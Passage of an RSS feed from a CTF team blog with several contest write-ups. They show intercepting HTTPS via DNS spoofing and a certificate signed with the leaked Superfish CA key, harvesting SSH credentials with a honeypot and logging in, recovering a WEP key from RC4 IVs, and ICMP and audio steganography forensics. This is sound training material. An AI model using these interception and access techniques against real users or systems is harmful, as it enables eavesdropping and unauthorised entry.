dnsmasq: /etc/hosts my.bank is 188.166.48.175</pre><p>Dump all traffic after setting up <em>dnsmasq</em> and then look for an incoming connection:</p><p><img src="/sites/default/files/writeups/images/bkp2015_kendall_tcpdump_https.PNG" alt="" width="1200" height="447"></p><p>It is coming to port 443... Okay. Let's process it, hope the finish is close!</p><pre class="brush: bash; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">root@evildns:/tmp# nc -lvvv -p 443
listening on [any] 443 ...
connect to [188.166.48.175] from ec2-52-0-164-37.compute-1.amazonaws.com [52.0.164.37] 50092
?&lt;ؠ&lt;??5?_? ?,?E?y?]?^`g'i\??0?,?(?$??
??kj98???2?.?*?&amp;???=5???
?/?+?'?#?? ??g@32??ED?1?-?)?%???&lt;/?A???
??m
42
^C sent 0, rcvd 289</pre><p>Looks like an SSL Client Hello packet. Come on! This task is worth just 300 points!</p><p>Looks like we have to set up an HTTPS server, let's do this. I'm sure there are many scripts and light-weight servers for such a task, but I had nginx installed and decided to serve HTTPS with it.</p><p>Create a self-signed certificate:</p><pre class="brush: bash; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">root@evildns:/etc/nginx# openssl genrsa -out my.bank.key 2048
Generating RSA private key, 2048 bit long modulus
............................................................................+++
............+++
e is 65537 (0x10001)
root@evildns:/etc/nginx# openssl req -new -sha1 -key my.bank.key -out my.bank.csr
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:
State or Province Name (full name) [Some-State]:
Locality Name (eg, city) []:
Organization Name (eg, company) [Internet Widgits Pty Ltd]:
Organizational Unit Name (eg, section) []:
Common Name (e.g. server FQDN or YOUR name) []:my.bank
Email Address []:
Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:
An optional company name []:
root@evildns:/etc/nginx# openssl x509 -req -days 365 -in my.bank.csr -signkey my.bank.key -out my.bank.crt
Signature ok
subject=/C=AU/ST=Some-State/O=Internet Widgits Pty Ltd/CN=my.bank
Getting Private key</pre><p>and set up nginx for HTTPS with that cert:</p><pre class="brush: bash; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">server {
    listen 443 ssl;
    ssl_certificate my.bank.crt;
    ssl_certificate_key my.bank.key;
    ssl_protocols TLSv1 TLSv1.1 TLSv1.2;
    ssl on;
    ssl_session_timeout 5m;
    ssl_ciphers ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv3:+EXP;
    ssl_prefer_server_ciphers on;
    root /data/www;
    location = / {
        index index.html;
    }
    location / {
        default_type "text/html";
        try_files $uri $uri.html;
    }
}</pre><p>Let's look into the traffic again. Hopefully the flag is there now!</p><pre class="brush: bash; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">root@evildns:/etc/nginx# tail -f /var/log/nginx/access.log
&lt;...&gt;
52.0.164.37 - - [28/Feb/2015:16:43:02 +0400] "-" 400 0 "-" "-"</pre><p>Come on! Where is the flag? We have even set up HTTPS already, WTF?</p><p><img src="/sites/default/files/writeups/images/bkp2015_kendall_unknown_ca.PNG" alt=""></p><p>Unknown CA? Of course it is unknown! Where would we get a trusted CA that would sign a certificate for the <em>my.bank</em> domain?</p><p>Our <em>my.bank</em> certificate is self-signed without any CA. Later we tried to create a self-signed root CA certificate and sign the <em>my.bank</em> cert with it. It did not help.</p><p>As we learned from the task's author after solving the task, the HTTP request to <em>yandex.ru</em> contained a hint about this stage. But as I wrote above about <em>yandex.ru</em>,&nbsp;we did not receive any incoming connection on port 80 when we spoofed the <em>yandex.ru</em> domain.</p><p>However, if you follow information security news you should have heard about the leaked <em>Superfish Inc. </em>certificate (and the corresponding pre-installed backdoor in Lenovo laptops). More info in the <a href="http://blog.erratasec.com/2015/02/extracting-superfish-certificate.html">Errata Security blog</a>, for example.</p><p>&nbsp;Let's try to sign our <em>my.bank</em> certificate with the&nbsp;<em>Superfish Inc.</em> key:</p><pre class="brush: bash; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">root@evildns:/etc/nginx# openssl x509 -req -days 365 -in my.bank.csr -CAkey super.pem -CA super.crt -out supermy.bank.crt
Signature ok
subject=/C=AU/ST=Some-State/O=Internet Widgits Pty Ltd/CN=my.bank
Getting CA Private Key
Enter pass phrase for super.pem:</pre><p>and listen for incoming requests again:</p><pre class="brush: bash; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">root@evildns:/etc/nginx# tail -f /var/log/nginx/access.log
&lt;...&gt;
52.0.164.37 - - [28/Feb/2015:13:44:53 +0000] "GET /login/username=FLG-SIK9KSRBHIYUKNGEBXlKW3B7HS2I HTTP/1.1" 404 168 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0"</pre><p>I'm happy to say that the username from the request is the flag!</p><p>Flag:&nbsp;<strong>FLG-SIK9KSRBHIYUKNGEBXlKW3B7HS2I</strong></p><p>&nbsp;</p><p><strong>Afterword</strong></p><p>This task is awesome. My teammates and I enjoyed it very much once we fully understood how to solve it.</p><p>The task and its author are&nbsp;praiseworthy for all the interesting hacking steps that must be done to solve it. But not only for that. This is an amazing example of how dangerous information technologies are nowadays for general users. Even for all users, I think.</p><p>Thank you BostonKeyParty, and respect for such a challenge!&nbsp;</p><p>Overview of the task from its author:&nbsp;<a href="http://mweissbacher.com/blog/2015/03/01/boston-key-party-2015-kendall-challenge-superfish/">http://mweissbacher.com/blog/2015/03/01/boston-key-party-2015-kendall-challenge-superfish/</a></p></div></div></div><div class="field field-name-field-file field-type-file field-label-above"><div class="field-label">Attachments:&nbsp;</div><div class="field-items"><div class="field-item even"><span class="file"><img class="file-icon" alt="Binary Data" title="application/octet-stream" src="/modules/file/icons/application-octet-stream.png" /> <a href="https://ctfcrew.org/sites/default/files/writeups/kendall.tar_.gz" type="application/octet-stream; length=5103">kendall.tar_.gz</a></span></div></div></div></description>
<pubDate>Mon, 02 Mar 2015 11:00:58 +0000</pubDate>
<dc:creator>Dor1s</dc:creator>
<guid isPermaLink="false">97 at https://ctfcrew.org</guid>
<comments>https://ctfcrew.org/writeup/97#comments</comments>
</item>
<item>
<title>cloudfs forensics(200)</title>
<link>https://ctfcrew.org/writeup/96</link>
<description><div class="field field-name-field-category field-type-taxonomy-term-reference field-label-inline clearfix"><div class="field-label">Category:&nbsp;</div><div class="field-items"><div class="field-item even"><a href="/categories/forensics">forensics</a></div></div></div><div class="field field-name-field-event field-type-taxonomy-term-reference field-label-inline clearfix"><div class="field-label">Event:&nbsp;</div><div class="field-items"><div class="field-item even"><a href="/event/31">Ghost in the Shellcode CTF Quals 2015</a></div></div></div><div class="field field-name-body field-type-text-with-summary field-label-hidden"><div class="field-items"><div class="field-item even"><p>We have just finished the Ghost in the Shellcode CTF in 12th place. Though GITS CTF is usually one of the best CTFs, this year it wasn't that good. The web task had a good idea but wasn't correctly implemented; some people got the flag right away from others' exploitations.&nbsp;The forensics tasks weren't really PURE forensics. Yet, I personally enjoyed the CTF and enjoyed the cloudfs challenge.&nbsp;</p><p>Cloudfs was a forensics&nbsp;challenge worth 200 points. The task description was "find the key". After downloading the task file, we&nbsp;checked it and it was compressed with xz. After decompressing the file, we got a pcap file. Opening the PCAP file with wireshark, we found around 3K packets. Checking the Protocol&nbsp;Hierarchy of the packets we got the following result: 98.81% of the&nbsp;packets are ICMP packets.</p><p><img src="/sites/default/files/writeups/images/Screen%20Shot%202015-01-21%20at%202.38.03%20PM.png" alt="" width="1200" height="782"></p><p>It simply means that the flag must be inside the ICMP packets. To start solving this challenge, we need to understand what ICMP packets are. The Internet Control Message Protocol is part of the Internet Protocol Suite, as defined in RFC 792. ICMP messages are typically used for diagnostic or control purposes or generated in response to errors in IP operations (as specified in RFC 1122). The ICMP protocol has many&nbsp;functionalities, like sending error messages such as&nbsp;Destination Unreachable, Time Exceeded,&nbsp;etc. One of the ICMP protocol functionalities is ICMP echo request/reply. In a normal ICMP echo packet, the sender usually sends 48 bytes of data to the&nbsp;recipient, who should echo this data back. Usually this type of ICMP packet is used as&nbsp;an indication that the&nbsp;recipient is up and running. In a normal ICMP echo request/reply, the data section should include&nbsp;some of these bytes "11:12:13:14:15:16:17:18:19:1a:1b:1c:1d:1e:1f:20:21:22:23:24:25:26:27:28:29:2a:2b:2c:2d:2e:2f:30:31:32:33:34:35:36:37" and usually the default size of the ICMP echo request is 48 bytes.&nbsp;</p><p><img src="/sites/default/files/writeups/images/Screen%20Shot%202015-01-21%20at%202.54.40%20PM.png" alt="" width="1200" height="414"></p><p>By looking at the ICMP packets in the given pcap file, we realized that the size of each packet is NOT 48 bytes. We also noticed that the packets do not contain the normal data that is sent in usual ICMP echo request packets. We decided that we should dump the data of all these packets, keep the unique ones, then un-hex them and try to understand what they might mean. We dumped all data of the ICMP packets using tshark with the following options.&nbsp;</p><pre class="brush: bash; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">$ tshark -r cloudfs -Y "icmp" -T fields -e data &gt; raw_data</pre><p>Now we have the raw_data of the ICMP echo packets. We need to do 2 things: first remove all duplicates, and then un-hex the data. This can be done with a very simple python script. 
The following script does what I have explained above.</p><pre class="brush: python; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag" title="Python">import binascii

# raw_data: one hex-encoded ICMP data field per line, as dumped by tshark
f = open('raw_data', 'r')
lines = f.read().splitlines()
f.close()

output = []  # unique decoded payloads, in order of first appearance
for l in lines:
    try:
        val = binascii.unhexlify(l)
    except (TypeError, ValueError):
        # skip lines that are not clean hex (e.g. empty data fields)
        print("In Exception " + l)
        continue
    if val not in output:
        output.append(val)

w = open('output_raw_decoded', 'wb')
for i in output:
    w.write(i)
w.close()</pre><p>Now we have the unique data dumped into a file and decoded. The next stage is to try to understand this data. What is this file? I checked output_raw_decoded with the file command but it just showed its type as "data". I then decided to run binwalk to see if there is any recognizable data within this binary blob. Indeed, binwalk shows us the following result.&nbsp;</p><p><img src="/sites/default/files/writeups/images/Screen%20Shot%202015-01-21%20at%203.05.57%20PM.png" alt="" width="777" height="130"></p><p>We can see a bzip2 compressed file here. We dumped the compressed file using dd with the following options:</p><pre class="brush: bash; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">$ dd if=output_raw_decoded of=compressed_output skip=1480 bs=1</pre><p>Now we have another file whose type we should check to see what is inside. However, I simply tried to cat the file directly before even checking its type and I got this.&nbsp;</p><p><img src="/sites/default/files/writeups/images/Screen%20Shot%202015-01-21%20at%203.11.21%20PM.png" alt="" width="1200" height="462"></p><p>We can see the key now ...</p><p><strong>key{WhyWouldYouEverUseThis}</strong></p><p>I hope you enjoyed the write-up</p><p>Regards</p></div></div></div></description>
<pubDate>Wed, 21 Jan 2015 13:24:56 +0000</pubDate>
<dc:creator>the_storm</dc:creator>
<guid isPermaLink="false">96 at https://ctfcrew.org</guid>
<comments>https://ctfcrew.org/writeup/96#comments</comments>
</item>
<item>
<title>Rick (malware 15)</title>
<link>https://ctfcrew.org/writeup/95</link>
<description><div class="field field-name-field-category field-type-taxonomy-term-reference field-label-inline clearfix"><div class="field-label">Category:&nbsp;</div><div class="field-items"><div class="field-item even"><a href="/categories/admin">admin</a></div></div></div><div class="field field-name-field-event field-type-taxonomy-term-reference field-label-inline clearfix"><div class="field-label">Event:&nbsp;</div><div class="field-items"><div class="field-item even"><a href="/event/30">31C3 CTF Quals 2014</a></div></div></div><div class="field field-name-body field-type-text-with-summary field-label-hidden"><div class="field-items"><div class="field-item even"><p>The task description says that "seems like somebody got pwned&nbsp;<a style="box-sizing: border-box; color: #337ab7;" href="http://188.40.18.67/">http://188.40.18.67</a>". When I went to the link I was immediately rickrolled.</p><p>&nbsp;Ok, let's look for something in the page source. Here we can see an HTML comment:</p><pre class="brush: bash; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">&lt;!-- ERROR: Could not write logfile - attacking IP_ADDRESS:22 --&gt;</pre><p>where IP_ADDRESS was my external IP address. It looks like the page is trying to connect to me via SSH.</p><p>Let's look for login attempts:</p><pre class="brush: bash; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">$ tail -f /var/log/auth.log | grep 188.40.18.67</pre><p>And after requesting the page via curl</p><pre class="brush: bash; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">$ curl -i http://188.40.18.67/</pre><p>we can see the log:</p><pre class="brush: bash; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">Dec 28 14:30:39 azrael sshd[30330]: Invalid user admin from 188.40.18.67
Dec 28 14:30:41 azrael sshd[30330]: Failed password for invalid user admin from 188.40.18.67 port 32964 ssh2
Dec 28 14:30:42 azrael sshd[30332]: Invalid user oracle from 188.40.18.67
Dec 28 14:30:44 azrael sshd[30332]: Failed password for invalid user oracle from 188.40.18.67 port 32965 ssh2
Dec 28 14:30:44 azrael sshd[30330]: Connection closed by 188.40.18.67 [preauth]
Dec 28 14:30:45 azrael sshd[30334]: Invalid user hans from 188.40.18.67
Dec 28 14:30:47 azrael sshd[30334]: Failed password for invalid user hans from 188.40.18.67 port 32966 ssh2
Dec 28 14:30:47 azrael sshd[30332]: Connection closed by 188.40.18.67 [preauth]
Dec 28 14:30:47 azrael sshd[30334]: Connection closed by 188.40.18.67 [preauth]</pre><p>We can see that some host is trying to log in via SSH with three different usernames (admin, oracle and hans). This behavior is very similar to a botnet, where one infected machine tries to log in to another by SSH brute force. Maybe some of these credentials are also valid for the game (infected) server.</p><p>We need to catch the passwords for these accounts. For this purpose I ran the awesome SSH honeypot <a href="https://github.com/desaster/kippo">kippo</a> on port 22. How to install and set up kippo you can read <a href="https://www.digitalocean.com/community/tutorials/how-to-install-kippo-an-ssh-honeypot-on-an-ubuntu-cloud-server">here</a>, and how to set up kippo event logging you can read <a href="http://bruteforce.gr/logging-kippo-events-using-mysql-db.html">here</a>.</p><p>Now let's repeat the curl request and look into the MySQL login attempts table:</p><pre class="brush: bash; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">$ mysql -u kippo -p</pre><pre class="brush: sql; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">&gt; USE kippo;
&gt; SELECT * from auth;</pre><p>&nbsp;And this is the result:</p><pre class="brush: bash; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">+----+----------------------------------+---------+----------+----------------------+---------------------+
| id | session                          | success | username | password             | timestamp           |
+----+----------------------------------+---------+----------+----------------------+---------------------+
|  1 | 686aaff48edc11e4901c04012f2f8f01 |       0 | admin    | admin                | 2014-12-28 21:56:42 |
|  2 | 696d26708edc11e4901c04012f2f8f01 |       0 | oracle   | oracle123            | 2014-12-28 21:56:44 |
|  3 | 6a7f8cc48edc11e4901c04012f2f8f01 |       0 | hans     | =l@Zy+&amp;'}M_.]&lt;zEcDN9 | 2014-12-28 21:56:46 |
+----+----------------------------------+---------+----------+----------------------+---------------------+</pre><p>So we got three (login, password) pairs. The "admin" and "oracle" passwords are quite typical, but the "hans" password looks very interesting. Let's try it:</p><pre class="brush: bash; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">$ ssh [email protected]
[email protected]'s password:
Last login: Tue Dec 28 13:55:47 2014 from &lt;some_ip_here&gt;</pre><p>Ok, we are on the server and now we can get the flag:</p><pre class="brush: bash; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">hans@31c3ctf-rick:~$ ls -la
total 12
drwxr-xr-x 2 root root 4096 Dec 28 00:09 .
drwxr-xr-x 4 root root 4096 Dec 27 20:48 ..
-rw-r--r-- 1 root root 38 Dec 28 00:09 flag.txt
hans@31c3ctf-rick:~$ cat flag.txt
31c3_a5bb3ead8fbc6617374ea3f57f0563d2</pre><p>The flag is&nbsp;<strong>31c3_a5bb3ead8fbc6617374ea3f57f0563d2</strong>.</p></div></div></div></description>
<pubDate>Mon, 29 Dec 2014 21:16:53 +0000</pubDate>
<dc:creator>azrael</dc:creator>
<guid isPermaLink="false">95 at https://ctfcrew.org</guid>
<comments>https://ctfcrew.org/writeup/95#comments</comments>
</item>
<item>
<title>This week for our team</title>
<link>https://ctfcrew.org/blog/94</link>
<description><div class="field field-name-body field-type-text-with-summary field-label-hidden"><div class="field-items"><div class="field-item even"><p class="p1"><span class="s1">This weekend we are going to take part in three on-site final challenges.</span></p><p class="p2">&nbsp;</p><p class="p1"><span class="s1">The first one is <strong>D-CTF 2014 Final</strong> at the DefCamp Conference (http://defcamp.ro/) on information security, Bucharest, Romania.</span>&nbsp;</p><p class="p1"><span class="s1">The second is <strong>CSCAMP CTF 2014 Final</strong> held in Cairo, Egypt (http://www.cairosecuritycamp.com/).</span></p><p class="p1"><span class="s1">And the third one is the <strong>PRO-IB</strong> competition - the Russian national contest on information security business cases for students (http://www.pro-ib.org/). So our youngest members will be there. They qualified for the final with first place in the preliminary rating.</span></p><p class="p2"><span class="s1"><img src="/sites/default/files/writeups/images/bc_selfie_bucharest_2014.jpg" alt="" width="1200" height="900"></span></p><p class="p1"><span class="s1">Hope it is not a bad idea to spread ourselves so widely - three finals at one time. It will be hard. But anyway, we did not qualify for all three events just to miss such opportunities.</span></p><p class="p2">&nbsp;</p><p class="p1"><span class="s1">Big thanks to our sponsor <a href="http://university.innopolis.ru/">Innopolis University</a> for supporting our trip to CSCAMP CTF 2014 Final.&nbsp;</span></p><p class="p2">&nbsp;</p><p class="p1"><span class="s1">Hope we will win some money and cover the expenses for the other trips :)</span></p><p class="p1"><span class="s1">One more thing... This week our team celebrates its 2nd birthday. Sure that</span></p><p class="p1"><span class="s1"><img src="/sites/default/files/writeups/images/this_journey_is_1%25_finished.jpg" alt="" width="1024" height="768"></span></p><p>&nbsp;</p><p class="p1"><span class="s1">Happy hacking!</span></p></div></div></div></description>
<pubDate>Thu, 27 Nov 2014 21:57:48 +0000</pubDate>
<dc:creator>Dor1s</dc:creator>
<guid isPermaLink="false">94 at https://ctfcrew.org</guid>
<comments>https://ctfcrew.org/blog/94#comments</comments>
</item>
<item>
<title>Collect as much as you can (Crypto 300)</title>
<link>https://ctfcrew.org/writeup/93</link>
<description><div class="field field-name-field-category field-type-taxonomy-term-reference field-label-inline clearfix"><div class="field-label">Category:&nbsp;</div><div class="field-items"><div class="field-item even"><a href="/categories/crypto">crypto</a></div></div></div><div class="field field-name-field-event field-type-taxonomy-term-reference field-label-inline clearfix"><div class="field-label">Event:&nbsp;</div><div class="field-items"><div class="field-item even"><a href="/event/29">CSCAMP CTF Quals 2014</a></div></div></div><div class="field field-name-body field-type-text-with-summary field-label-hidden"><div class="field-items"><div class="field-item even"><p>The description contains an ip address and port to connect to and a hint: IVs.</p><p>When we connect to the given ip and port we find that the server gives us the result of an encryption and 3 numbers that increment sequentially:</p><pre class="brush: plain; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">123
Server response: 5a6bea4f:18:31:33
1234
Server response: 1a6fda664e:18:33:115
12345
Server response: ca236e16faad:18:35:215</pre><p>It's obvious that some stream cipher was used for encryption: the ciphertext grows by exactly one byte per input byte. The last 3 numbers seem to be 3 bytes, which are parts of the IV, so the IV is 24 bits long.</p><p>Googling "24 bit IV" gives us a reference to a wiki page: <a href="http://en.wikipedia.org/wiki/Initialization_vector#WEP_IV">http://en.wikipedia.org/wiki/Initialization_vector#WEP_IV</a>. Because WEP uses the widely known stream cipher RC4, this seems to be the right way.</p><p>So we have to crack WEP. Suppose the encryption key is the flag.</p><p>After a little more googling we found a scientific paper: <a href="http://eprint.iacr.org/2007/120.pdf">http://eprint.iacr.org/2007/120.pdf</a>. For this attack we need a lot of pairs (IV, streamGamma), i.e. an IV and the keystream it produces. Fortunately collecting them is easily automated in Python, and ~58 MB of data with ~290000 pairs was collected.</p><p>Because we did not find an implementation of this attack (not even a PoC) that takes data in an obvious format, we decided to implement the attack ourselves. The title of the paper is "Breaking 104 bit WEP in less than 60 seconds", which means the attack is fast enough to be coded in a `not fast language` like Python. That was the way we went.</p><p>For implementing the attack, only formula (5) from the paper and the first 2 paragraphs of section 6 are needed.</p><p>After coding, when we ran our implementation on the collected data for the first time, we found that the computed votes have a distribution close to a normal one centred near 0... 
but we noticed that there are local spikes, which get us close to an ASCII string key.</p><p><span style="text-decoration: underline;">ROUND 1</span></p><p>In this way, by manually searching for such spikes, we found the key "<strong>RC4isNOTbadWEP</strong>", but we couldn't submit this result as the flag...&nbsp;The reason was that the organizers had simplified the task: they fixed 8 bits of the 24-bit IV (this has no influence on the selected attack) and reduced the key length:</p><p>&nbsp;</p><blockquote><p>01:07 (Dor1s) hi</p><p>01:07 (Dor1s) we solved crypto300</p><p>01:07 (Dor1s) but site is not loading</p><p>01:07 (Dor1s) how we can submit it?</p><p>01:10 __nu11___: what is your key?</p><p>01:10 (Dor1s) RC4isNOTbadWEP</p><p>01:11 __nu11___: well you have IVs from yesterday aren't you?</p><p>01:11 (Dor1s) yeah, from yesterday too</p><p>01:11 __nu11___: haven't you*</p><p>01:12 __nu11___: I am afraid that we have changed it to make it easier</p><p>01:12 (Dor1s) omg :D</p><p>01:12 __nu11___: but no worries</p><p>01:12 __nu11___: the key now is only 5 bytes</p><p>01:12 __nu11___: you only collect 255 IVs</p><p>01:12 __nu11___: so you should solve it in minutes</p></blockquote><p>&nbsp;</p><p><span style="text-decoration: underline;">ROUND 2</span></p><p>Because data collection had already been automated via a Python script, we spent the time it took to collect the needed data on upgrading the attack script. The first upgrade concerned speed: now the attack script computes all votes for 290000 pairs in only 10 seconds instead of 30.</p><p>The second upgrade was the most significant one and concerned the logic. Formula (5) returns votes that are either positive or negative numbers. But as we know, each key element is a byte, so all votes for it should be in the range [0,255]. So when we count the frequency of every possible key value we should sum the votes whose values are the same after a mod 256 operation. 
With enough data this gives us automated key value extraction (we select the value with the highest frequency).</p><p>Now, when ~9 MB of data (~67000 pairs) have been collected, we can run our attack script on it...</p><pre class="brush: bash; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">&gt;extractWepkey.py
67470 pairs have been read in 0.72591048583 seconds!
make votes...
votes ready in 2.18306579468 seconds!
(0, -258, 251)
(1, -262, 248)
(2, -266, 243)
(3, -272, 237)
(4, -280, 228)
sigma_0 max = 119 : 357
sigma_1 max = 220 : 375
sigma_2 max = 76 : 363
sigma_3 max = 190 : 330
sigma_4 max = 33 : 367
auto guess key = weprc</pre><p>So the flag is <strong>weprc</strong></p><p>All scripts and collected data can be found here: <a href="https://github.com/BalalaikaCr3w/CTF/tree/master/CSCAMPCTFQuals2014/crypto300">https://github.com/BalalaikaCr3w/CTF/tree/master/CSCAMPCTFQuals2014/crypto300</a></p></div></div></div></description>
<pubDate>Sun, 23 Nov 2014 01:06:30 +0000</pubDate>
<dc:creator>Dil4rd</dc:creator>
<guid isPermaLink="false">93 at https://ctfcrew.org</guid>
<comments>https://ctfcrew.org/writeup/93#comments</comments>
</item>
<item>
<title>WireTap (Stegano 200)</title>
<link>https://ctfcrew.org/writeup/91</link>
<description><div class="field field-name-field-category field-type-taxonomy-term-reference field-label-inline clearfix"><div class="field-label">Category:&nbsp;</div><div class="field-items"><div class="field-item even"><a href="/categories/stego">stego</a></div></div></div><div class="field field-name-field-event field-type-taxonomy-term-reference field-label-inline clearfix"><div class="field-label">Event:&nbsp;</div><div class="field-items"><div class="field-item even"><a href="/event/28">No cON Name CTF Finals 2014</a></div></div></div><div class="field field-name-body field-type-text-with-summary field-label-hidden"><div class="field-items"><div class="field-item even"><p><span data-rz-clipboard="true"><strong>Description:</strong> Does it sound like a flag? Maybe... I don't know...</span></p><p><span data-rz-clipboard="true">File: <a href="https://cloud.mail.ru/public/fd1b20161fe5/wiretap.wav.tar.xz">wiretap.wav</a></span></p><p><strong>Solution:</strong></p><p>Let's quickly analyze the file:</p><pre class="brush: bash; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag"> $ file wiretap.wav
wiretap.wav: RIFF (little-endian) data, WAVE audio, Microsoft PCM, 32 bit, stereo 44100 Hz
$ strings wiretap.wav
RIFFD
WAVEfmt
data </pre><p>Nothing interesting. Now let's look at the data of the .wav file:</p><pre class="brush: bash; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">$ ./diff.py
n of channels:
2
n of frames:
1186020
len(frames):
9488160
44100
2
[5373952 7143424 8388608 ..., 5111808 4980736 4915200]
[5374089 7143504 8388686 ..., 5111991 4980814 4915379]</pre><p>Sample values from the two channels are close but not identical. Let's look at their difference (first 100 printed):</p><pre class="brush: python; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">[137, 80, 78, 71, 13, 10, 26, 10, 0, 0, 0, 13, 73, 72, 68, 82, 0, 0, 2, 22, 0, 0, 0, 48, 8, 4, 0, 0, 0, 231, 36, 251, 90, 0, 0, 0, 2, 98, 75, 71, 68, 0, 0, 170, 141, 35, 50, 0, 0, 0, 9, 112, 72, 89, 115, 0, 0, 11, 19, 0, 0, 11, 19, 1, 0, 154, 156, 24, 0, 0, 0, 7, 116, 73, 77, 69, 7, 222, 10, 26, 15, 41, 21, 179, 51, 68, 152, 0, 0, 0, 29, 105, 84, 88, 116, 67, 111, 109, 109, 101]</pre><p>It seems that all of them fall within the byte range [0..255]. Some of you may have already noticed that bytes 2 to 4 are the printable characters 'PNG' (80, 78, 71), preceded by 137: the PNG file signature. Let's write the difference of the channels into a file and look at it:</p><pre class="brush: bash; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">$ file result
result: PNG image data, 534 x 48, 8-bit gray+alpha, non-interlaced</pre><p>Wow! Look at this:</p><p><img src="/sites/default/files/writeups/images/result_ncn2014final_wav.png" alt="" width="534" height="48"></p><p>My script for solving this task:</p><pre class="brush: python; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">#!/usr/bin/python
# Python 2 script: the wave module is used for metadata, scipy for the samples.
import wave
from scipy.io.wavfile import read
w = wave.open('wiretap.wav', 'r')
print 'n of channels:'
print w.getnchannels()
n = w.getnframes()
print 'n of frames:'
print n
frames = w.readframes(n)
print 'len(frames):'
print len(frames)
# scipy returns the sample rate and an (nframes, nchannels) array
(fs, x) = read('wiretap.wav')
print fs
print len(x.shape)
print x[:,0]
print x[:,1]
c1 = x[:,0]
c2 = x[:,1]
# the hidden file is encoded as the per-sample difference between the channels
d = []
for a, b in zip(c1, c2):
    d.append(b - a)
print d[0:100]
# every difference fits in one byte, so dump them verbatim into a file
out = open('result', 'wb')
for t in d: out.write(chr(t))
out.close()</pre><p>Flag is: <strong>NcN_132238aba8928f9655eeb09939eba1f963c18183</strong></p><p>&nbsp;</p></div></div></div></description>
<pubDate>Sun, 02 Nov 2014 19:37:53 +0000</pubDate>
<dc:creator>Dor1s</dc:creator>
<guid isPermaLink="false">91 at https://ctfcrew.org</guid>
<comments>https://ctfcrew.org/writeup/91#comments</comments>
</item>
</channel>
</rss>